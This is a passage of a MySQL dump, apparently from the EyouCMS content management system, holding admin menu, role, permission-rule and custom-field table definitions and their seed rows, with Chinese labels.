`parent_id` int(11) DEFAULT '0' COMMENT '父级ID',
`name` varchar(50) DEFAULT '' COMMENT '名称',
`controller` varchar(50) DEFAULT '' COMMENT '控制器',
`action` varchar(50) DEFAULT '' COMMENT '操作名',
`grade` tinyint(1) DEFAULT '0' COMMENT '级别',
`url` varchar(200) DEFAULT '' COMMENT '链接',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`is_menu` tinyint(1) DEFAULT '1' COMMENT '显示菜单(1=是,0=否)',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=正常,0=屏蔽)',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `parent_id` (`parent_id`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=515 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_auth_modular`
-- -----------------------------
INSERT INTO `ey_auth_modular` VALUES ('513', '481', 'SEO优化', 'Seo', 'index', '2', '', '100', '1', '1', '1524208193', '0');
INSERT INTO `ey_auth_modular` VALUES ('9', '514', '高级选项', '', '', '1', '', '0', '1', '1', '1503301507', '1527306955');
INSERT INTO `ey_auth_modular` VALUES ('12', '514', '基本信息', 'System', 'index', '1', '', '1', '1', '1', '0', '1527306913');
INSERT INTO `ey_auth_modular` VALUES ('13', '9', '修改密码', 'Admin', 'admin_pwd', '2', '', '3', '1', '1', '1503301723', '0');
INSERT INTO `ey_auth_modular` VALUES ('14', '9', '管理员列表', 'Admin', 'index', '2', '', '0', '1', '1', '1503301765', '1527306984');
INSERT INTO `ey_auth_modular` VALUES ('15', '9', '角色列表', 'Admin', 'role', '2', '', '0', '1', '1', '1503301781', '1527307009');
INSERT INTO `ey_auth_modular` VALUES ('16', '9', '模块列表', 'Admin', 'modular', '2', '', '0', '1', '1', '1503301793', '1527307006');
INSERT INTO `ey_auth_modular` VALUES ('17', '9', '权限列表', 'Admin', 'rule', '2', '', '0', '1', '1', '1503301805', '1527307004');
INSERT INTO `ey_auth_modular` VALUES ('18', '9', '日志列表', 'Admin', 'log', '2', '', '0', '1', '1', '1503301840', '1527306999');
INSERT INTO `ey_auth_modular` VALUES ('19', '9', '数据备份', 'Tools', 'index', '2', '', '0', '1', '1', '1503301857', '1527307033');
INSERT INTO `ey_auth_modular` VALUES ('21', '9', '数据还原', 'Tools', 'restore', '2', '', '0', '1', '1', '1503302091', '1527307044');
INSERT INTO `ey_auth_modular` VALUES ('22', '9', '地区列表', 'System', 'region', '2', '', '2', '0', '1', '1505441023', '0');
INSERT INTO `ey_auth_modular` VALUES ('23', '0', '常规', '', '', '0', '', '0', '1', '1', '1503308630', '1503367345');
INSERT INTO `ey_auth_modular` VALUES ('27', '514', '调试外观', '', '', '1', '', '1', '1', '1', '0', '1527306927');
INSERT INTO `ey_auth_modular` VALUES ('28', '27', '电脑版', 'Uiset', 'pc', '2', '/index.php/home/Index/index.html?ui_set=on', '0', '1', '1', '1503368313', '1523432343');
INSERT INTO `ey_auth_modular` VALUES ('30', '27', '手机版', 'Uiset', 'mobile', '2', '', '0', '1', '1', '1503368589', '1509093563');
INSERT INTO `ey_auth_modular` VALUES ('35', '9', '清除缓存', 'System', 'clearCache', '2', '', '20', '1', '1', '1503655673', '0');
INSERT INTO `ey_auth_modular` VALUES ('41', '23', '设置栏目', 'Arctype', 'index', '1', '', '0', '1', '1', '1503999661', '1527307162');
INSERT INTO `ey_auth_modular` VALUES ('62', '9', '邮件模板', 'EmailTemplate', 'index', '2', '', '5', '1', '1', '1505204834', '1509090070');
INSERT INTO `ey_auth_modular` VALUES ('64', '9', '短信模板', 'SmsTemplate', 'index', '2', '', '4', '1', '1', '1505204889', '1509086592');
INSERT INTO `ey_auth_modular` VALUES ('470', '23', '发布文档', 'Channeltype', 'index', '1', '', '0', '1', '1', '1505726990', '1527307178');
INSERT INTO `ey_auth_modular` VALUES ('480', '481', '友情链接', 'Links', 'index', '2', '', '7', '1', '1', '1505803829', '1522996913');
INSERT INTO `ey_auth_modular` VALUES ('481', '514', '营销设置', '', '', '1', '', '0', '1', '1', '1505873468', '1527306945');
INSERT INTO `ey_auth_modular` VALUES ('482', '481', '广告列表', 'Ad', 'index', '2', '', '0', '1', '1', '1505873498', '0');
INSERT INTO `ey_auth_modular` VALUES ('483', '481', '广告位置', 'AdPosition', 'index', '2', '', '0', '1', '1', '1505873675', '0');
INSERT INTO `ey_auth_modular` VALUES ('514', '0', '设置', '', '', '0', '', '100', '1', '1', '1527306892', '0');
-- -----------------------------
-- Table structure for `ey_auth_role`
-- -----------------------------
DROP TABLE IF EXISTS `ey_auth_role`;
CREATE TABLE `ey_auth_role` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(255) DEFAULT '' COMMENT '角色名',
`pid` int(10) DEFAULT '0' COMMENT '父角色ID',
`remark` text COMMENT '备注信息',
`grade` smallint(5) unsigned NOT NULL DEFAULT '0' COMMENT '级别',
`language` text COMMENT '多语言权限',
`online_update` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '在线升级',
`switch_map` tinyint(1) DEFAULT '0' COMMENT '功能地图',
`only_oneself` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '只看自己发布',
`check_oneself` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '发布文档自动通过审核,1--是,0--否',
`cud` varchar(255) DEFAULT '' COMMENT '增改删',
`permission` longtext COMMENT '已允许的权限',
`built_in` tinyint(1) DEFAULT '0' COMMENT '内置用户组,1表示内置',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=正常,0=屏蔽)',
`admin_id` int(10) DEFAULT '0' COMMENT '操作管理员ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='管理员角色表';
-- -----------------------------
-- Records of `ey_auth_role`
-- -----------------------------
INSERT INTO `ey_auth_role` VALUES ('1', '优化推广员', '0', '', '0', 'a:1:{i:0;s:2:\"cn\";}', '0', '1', '1', '1', 'a:3:{i:0;s:3:\"add\";i:1;s:4:\"edit\";i:2;s:3:\"del\";}', 'a:2:{s:5:\"rules\";a:8:{i:0;s:1:\"1\";i:1;s:1:\"3\";i:2;s:1:\"4\";i:3;s:1:\"8\";i:4;s:1:\"9\";i:5;s:2:\"10\";i:6;s:2:\"14\";i:7;i:2;}s:7:\"arctype\";a:40:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";i:6;s:2:\"33\";i:7;s:2:\"34\";i:8;s:2:\"35\";i:9;s:2:\"36\";i:10;s:2:\"37\";i:11;s:2:\"38\";i:12;s:2:\"39\";i:13;s:2:\"40\";i:14;s:2:\"41\";i:15;s:2:\"42\";i:16;s:2:\"43\";i:17;s:2:\"44\";i:18;s:2:\"45\";i:19;s:2:\"46\";i:20;s:2:\"47\";i:21;s:2:\"48\";i:22;s:1:\"8\";i:23;s:2:\"32\";i:24;s:1:\"9\";i:25;s:2:\"30\";i:26;s:2:\"31\";i:27;s:2:\"11\";i:28;s:2:\"12\";i:29;s:2:\"13\";i:30;s:2:\"23\";i:31;s:2:\"20\";i:32;s:2:\"24\";i:33;s:2:\"25\";i:34;s:2:\"21\";i:35;s:2:\"26\";i:36;s:2:\"22\";i:37;s:2:\"27\";i:38;s:2:\"28\";i:39;s:2:\"29\";}}', '1', '100', '1', '0', '1541207843', '0');
INSERT INTO `ey_auth_role` VALUES ('2', '内容管理员', '0', '', '0', 'a:1:{i:0;s:2:\"cn\";}', '0', '1', '1', '1', 'a:3:{i:0;s:3:\"add\";i:1;s:4:\"edit\";i:2;s:3:\"del\";}', 'a:2:{s:5:\"rules\";a:4:{i:0;s:1:\"1\";i:1;s:2:\"10\";i:2;s:2:\"14\";i:3;i:2;}s:7:\"arctype\";a:40:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";i:6;s:2:\"33\";i:7;s:2:\"34\";i:8;s:2:\"35\";i:9;s:2:\"36\";i:10;s:2:\"37\";i:11;s:2:\"38\";i:12;s:2:\"39\";i:13;s:2:\"40\";i:14;s:2:\"41\";i:15;s:2:\"42\";i:16;s:2:\"43\";i:17;s:2:\"44\";i:18;s:2:\"45\";i:19;s:2:\"46\";i:20;s:2:\"47\";i:21;s:2:\"48\";i:22;s:1:\"8\";i:23;s:2:\"32\";i:24;s:1:\"9\";i:25;s:2:\"30\";i:26;s:2:\"31\";i:27;s:2:\"11\";i:28;s:2:\"12\";i:29;s:2:\"13\";i:30;s:2:\"23\";i:31;s:2:\"20\";i:32;s:2:\"24\";i:33;s:2:\"25\";i:34;s:2:\"21\";i:35;s:2:\"26\";i:36;s:2:\"22\";i:37;s:2:\"27\";i:38;s:2:\"28\";i:39;s:2:\"29\";}}', '1', '100', '1', '0', '1541207846', '0');
-- -----------------------------
-- Table structure for `ey_auth_role_admin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_auth_role_admin`;
CREATE TABLE `ey_auth_role_admin` (
`role_id` int(11) DEFAULT '0' COMMENT '角色 id',
`admin_id` int(11) DEFAULT '0' COMMENT '用户id',
KEY `role_id` (`role_id`) USING BTREE,
KEY `admin_id` (`admin_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='用户角色对应表';
-- -----------------------------
-- Records of `ey_auth_role_admin`
-- -----------------------------
INSERT INTO `ey_auth_role_admin` VALUES ('-1', '1');
INSERT INTO `ey_auth_role_admin` VALUES ('11', '22');
INSERT INTO `ey_auth_role_admin` VALUES ('12', '17');
INSERT INTO `ey_auth_role_admin` VALUES ('12', '16');
-- -----------------------------
-- Table structure for `ey_auth_rule`
-- -----------------------------
DROP TABLE IF EXISTS `ey_auth_rule`;
CREATE TABLE `ey_auth_rule` (
`id` smallint(6) unsigned NOT NULL AUTO_INCREMENT,
`modular_id` int(11) DEFAULT '0' COMMENT '所属模块',
`name` varchar(50) DEFAULT '' COMMENT '权限名字',
`right` text COMMENT '权限码(控制器+操作)',
`remark` varchar(255) DEFAULT '' COMMENT '备注',
`is_del` tinyint(1) DEFAULT '0' COMMENT '删除状态 1删除,0正常',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`is_menu` tinyint(1) DEFAULT '1' COMMENT '是否为菜单(1=是,0=否)',
`group` varchar(20) DEFAULT '' COMMENT '应用名称app',
`status` tinyint(1) DEFAULT '1' COMMENT '显示(1=正常,0=屏蔽)',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=213 DEFAULT CHARSET=utf8 COMMENT='后台权限菜单表';
-- -----------------------------
-- Records of `ey_auth_rule`
-- -----------------------------
INSERT INTO `ey_auth_rule` VALUES ('6', '17', '权限列表', 'Admin@rule', '', '0', '0', '1503390907', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('8', '14', '管理员列表', 'Admin@index', '', '0', '0', '1503392270', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('9', '15', '角色列表', 'Admin@role', '', '0', '0', '1503392666', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('38', '19', '数据备份列表', 'Tools@index', '', '0', '0', '1504515434', '0', '1', 'tools', '1');
INSERT INTO `ey_auth_rule` VALUES ('39', '21', '数据还原列表', 'Tools@restore', '', '0', '0', '1504515452', '0', '1', 'tools', '1');
INSERT INTO `ey_auth_rule` VALUES ('49', '18', '管理员日志', 'Admin@log', '', '0', '0', '1504485820', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('61', '35', '清除页面缓存', 'System@clearCache,System@clearHtmlCache', '', '0', '0', '1519357846', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('62', '13', '修改管理员密码', 'Admin@admin_pwd', '', '0', '0', '1504485678', '0', '1', 'system', '1');
INSERT INTO `ey_auth_rule` VALUES ('65', '17', '新增权限', 'Admin@rule_add', '', '0', '1503390930', '1503391981', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('66', '17', '编辑权限', 'Admin@rule_edit,Index@changeTableVal', '', '0', '1503390947', '1503392474', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('67', '17', '删除权限', 'Admin@rule_del', '', '0', '1503390965', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('70', '14', '新增管理员', 'Admin@admin_add', '', '0', '1503392290', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('71', '14', '编辑管理员', 'Admin@admin_edit,Index@changeTableVal', '', '0', '1503392302', '1517986419', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('72', '14', '删除管理员', 'Admin@admin_del', '', '0', '1503392315', '1504578385', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('73', '16', '模块列表', 'Admin@modular', '', '0', '1503392570', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('74', '16', '新增模块', 'Admin@modular_add', '', '0', '1503392591', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('75', '16', '编辑模块', 'Admin@modular_edit,Index@changeTableVal', '', '0', '1503392610', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('76', '16', '删除模块', 'Admin@modular_del', '', '0', '1503392626', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('77', '15', '新增角色', 'Admin@role_add', '', '0', '1503392691', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('78', '15', '编辑角色', 'Admin@role_edit,Index@changeTableVal', '', '0', '1503392718', '1517986448', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('79', '15', '删除角色', 'Admin@role_del', '', '0', '1503392736', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('81', '12', '平台设置', 'System@index,System@handle', '', '0', '1504486050', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('117', '19', '备份数据', 'Tools@export', '', '0', '1504514716', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('118', '19', '优化数据', 'Tools@optimize', '', '0', '1504514788', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('119', '19', '修复数据', 'Tools@repair', '', '0', '1504514809', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('120', '21', '导入sql文件', 'Tools@restoreUpload', '', '0', '1504515139', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('121', '21', '恢复数据 ', 'Tools@import', '', '0', '1504515184', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('122', '21', '下载数据', 'Tools@downFile', '', '0', '1504515311', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('123', '21', '删除数据', 'Tools@del', '', '0', '1504515399', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('128', '64', '短信模板列表', 'SmsTemplate@index', '', '0', '1517987270', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('129', '64', '新增短信模板', 'SmsTemplate@add', '', '0', '1517987289', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('130', '64', '编辑短信模板', 'SmsTemplate@edit,Index@changeTableVal', '', '0', '1517987336', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('131', '64', '删除短信模板', 'SmsTemplate@del', '', '0', '1517987359', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('132', '62', '邮件模板列表', 'EmailTemplate@index', '', '0', '1517987387', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('133', '62', '新增邮件模板', 'EmailTemplate@add', '', '0', '1517994951', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('134', '62', '编辑邮件模板', 'EmailTemplate@edit,Index@changeTableVal', '', '0', '1517994976', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('135', '62', '删除邮件模板', 'EmailTemplate@del', '', '0', '1517995005', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('140', '480', '友情链接列表', 'Links@index', '', '0', '1517995297', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('141', '480', '新增友情链接', 'Links@add', '', '0', '1517995311', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('142', '480', '编辑友情链接', 'Links@edit,Index@changeTableVal', '', '0', '1517995329', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('143', '480', '删除友情链接', 'Links@del', '', '0', '1517995344', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('144', '483', '广告位列表', 'AdPosition@index', '', '0', '1517995508', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('145', '483', '新增广告位', 'AdPosition@add', '', '0', '1517995525', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('146', '483', '编辑广告位', 'AdPosition@edit,Index@changeTableVal', '', '0', '1517995544', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('147', '483', '删除广告位', 'AdPosition@del', '', '0', '1517995556', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('148', '482', '广告列表', 'Ad@index', '', '0', '1517995581', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('149', '482', '新增广告', 'Ad@add', '', '0', '1517995595', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('150', '482', '编辑广告', 'Ad@edit,Index@changeTableVal', '', '0', '1517995612', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('151', '482', '删除广告', 'Ad@del', '', '0', '1517995626', '0', '0', '1', '', '1');
INSERT INTO `ey_auth_rule` VALUES ('212', '35', '清除数据缓存', 'System@clearCache,System@clearSystemCache,System@fastClearCache', '', '0', '1519357889', '0', '0', '1', '', '1');
-- -----------------------------
-- Table structure for `ey_channelfield`
-- -----------------------------
DROP TABLE IF EXISTS `ey_channelfield`;
CREATE TABLE `ey_channelfield` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '字段名称',
`channel_id` int(10) NOT NULL DEFAULT '0' COMMENT '所属文档模型id',
`title` varchar(250) NOT NULL DEFAULT '' COMMENT '字段标题',
`dtype` varchar(32) NOT NULL DEFAULT '' COMMENT '字段类型',
`define` text NOT NULL COMMENT '字段定义',
`maxlength` int(10) NOT NULL DEFAULT '0' COMMENT '最大长度,文本数据必须填写,大于255为text类型',
`dfvalue` text NOT NULL COMMENT '默认值',
`dfvalue_unit` varchar(50) NOT NULL DEFAULT '' COMMENT '数值单位',
`remark` varchar(256) NOT NULL DEFAULT '' COMMENT '提示说明',
`is_screening` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否应用于条件筛选',
`is_release` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否应用于会员投稿发布',
`ifeditable` tinyint(1) NOT NULL DEFAULT '1' COMMENT '是否在编辑页显示',
`ifrequire` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否必填',
`ifsystem` tinyint(1) NOT NULL DEFAULT '0' COMMENT '字段分类,1=系统(不可修改),0=自定义',
`ifmain` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否主表字段',
`ifcontrol` tinyint(1) NOT NULL DEFAULT '1' COMMENT '状态,控制该条数据是否允许被控制,1为不允许控制,0为允许控制',
`sort_order` int(5) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '状态',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
`set_type` tinyint(3) DEFAULT '0' COMMENT '区域选择时使用是否为三级联动,1-是',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=201 DEFAULT CHARSET=utf8 COMMENT='自定义字段表';
-- -----------------------------
-- Records of `ey_channelfield`
-- -----------------------------
INSERT INTO `ey_channelfield` VALUES ('1', 'add_time', '0', '新增时间', 'datetime', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091575', '1533091575', '0');
INSERT INTO `ey_channelfield` VALUES ('2', 'update_time', '0', '更新时间', 'datetime', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091601', '1533091601', '0');
INSERT INTO `ey_channelfield` VALUES ('3', 'aid', '0', '文档ID', 'int', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091624', '1533091624', '0');
INSERT INTO `ey_channelfield` VALUES ('4', 'typeid', '0', '当前栏目ID', 'int', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091930', '1533091930', '0');
INSERT INTO `ey_channelfield` VALUES ('5', 'channel', '0', '模型ID', 'int', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092214', '1533092214', '0');
INSERT INTO `ey_channelfield` VALUES ('6', 'is_b', '0', '是否加粗', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092246', '1533092246', '0');
INSERT INTO `ey_channelfield` VALUES ('7', 'title', '0', '文档标题', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092381', '1533092381', '0');
INSERT INTO `ey_channelfield` VALUES ('8', 'litpic', '0', '缩略图', 'img', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092398', '1533092398', '0');
INSERT INTO `ey_channelfield` VALUES ('9', 'is_head', '0', '是否头条', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092420', '1533092420', '0');
INSERT INTO `ey_channelfield` VALUES ('10', 'is_special', '0', '是否特荐', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092439', '1533092439', '0');
INSERT INTO `ey_channelfield` VALUES ('11', 'is_top', '0', '是否置顶', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092454', '1533092454', '0');
INSERT INTO `ey_channelfield` VALUES ('12', 'is_recom', '0', '是否推荐', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092468', '1533092468', '0');
INSERT INTO `ey_channelfield` VALUES ('13', 'is_jump', '0', '是否跳转', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092484', '1533092484', '0');
INSERT INTO `ey_channelfield` VALUES ('14', 'author', '0', '作者', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092498', '1533092498', '0');
INSERT INTO `ey_channelfield` VALUES ('15', 'click', '0', '浏览量', 'int', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092512', '1533092512', '0');
INSERT INTO `ey_channelfield` VALUES ('16', 'arcrank', '0', '阅读权限', 'select', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092534', '1533092534', '0');
INSERT INTO `ey_channelfield` VALUES ('17', 'jumplinks', '0', '跳转链接', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092553', '1533092553', '0');
INSERT INTO `ey_channelfield` VALUES ('18', 'ismake', '0', '是否静态页面', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092698', '1533092698', '0');
INSERT INTO `ey_channelfield` VALUES ('19', 'seo_title', '0', 'SEO标题', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092713', '1533092713', '0');
INSERT INTO `ey_channelfield` VALUES ('20', 'seo_keywords', '0', 'SEO关键词', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092725', '1533092725', '0');
INSERT INTO `ey_channelfield` VALUES ('21', 'seo_description', '0', 'SEO描述', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092739', '1533092739', '0');
INSERT INTO `ey_channelfield` VALUES ('22', 'status', '0', '状态', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092753', '1533092753', '0');
INSERT INTO `ey_channelfield` VALUES ('23', 'sort_order', '0', '排序号', 'int', 'int(11)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092766', '1533092766', '0');
INSERT INTO `ey_channelfield` VALUES ('24', 'content', '2', '内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533359739', '1533359739', '0');
INSERT INTO `ey_channelfield` VALUES ('25', 'content', '3', '内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533359588', '1533359588', '0');
INSERT INTO `ey_channelfield` VALUES ('26', 'content', '4', '内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533359752', '1533359752', '0');
INSERT INTO `ey_channelfield` VALUES ('27', 'content', '6', '内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533464715', '1533464715', '0');
INSERT INTO `ey_channelfield` VALUES ('29', 'content', '1', '内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533464713', '1533464713', '0');
INSERT INTO `ey_channelfield` VALUES ('30', 'update_time', '-99', '更新时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('31', 'add_time', '-99', '新增时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('32', 'status', '-99', '启用 (1=正常,0=屏蔽)', 'switch', 'tinyint(1)', '1', '1', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('33', 'is_part', '-99', '栏目属性:0=内容栏目,1=外部链接', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('34', 'is_hidden', '-99', '是否隐藏栏目:0=显示,1=隐藏', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('35', 'sort_order', '-99', '排序号', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('36', 'seo_description', '-99', 'seo描述', 'multitext', 'text', '0', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('37', 'seo_keywords', '-99', 'seo关键字', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('38', 'seo_title', '-99', 'SEO标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('39', 'tempview', '-99', '文档模板文件名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('40', 'templist', '-99', '列表模板文件名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('41', 'litpic', '-99', '栏目图片', 'img', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('42', 'typelink', '-99', '栏目链接', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('43', 'grade', '-99', '栏目等级', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('44', 'englist_name', '-99', '栏目英文名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
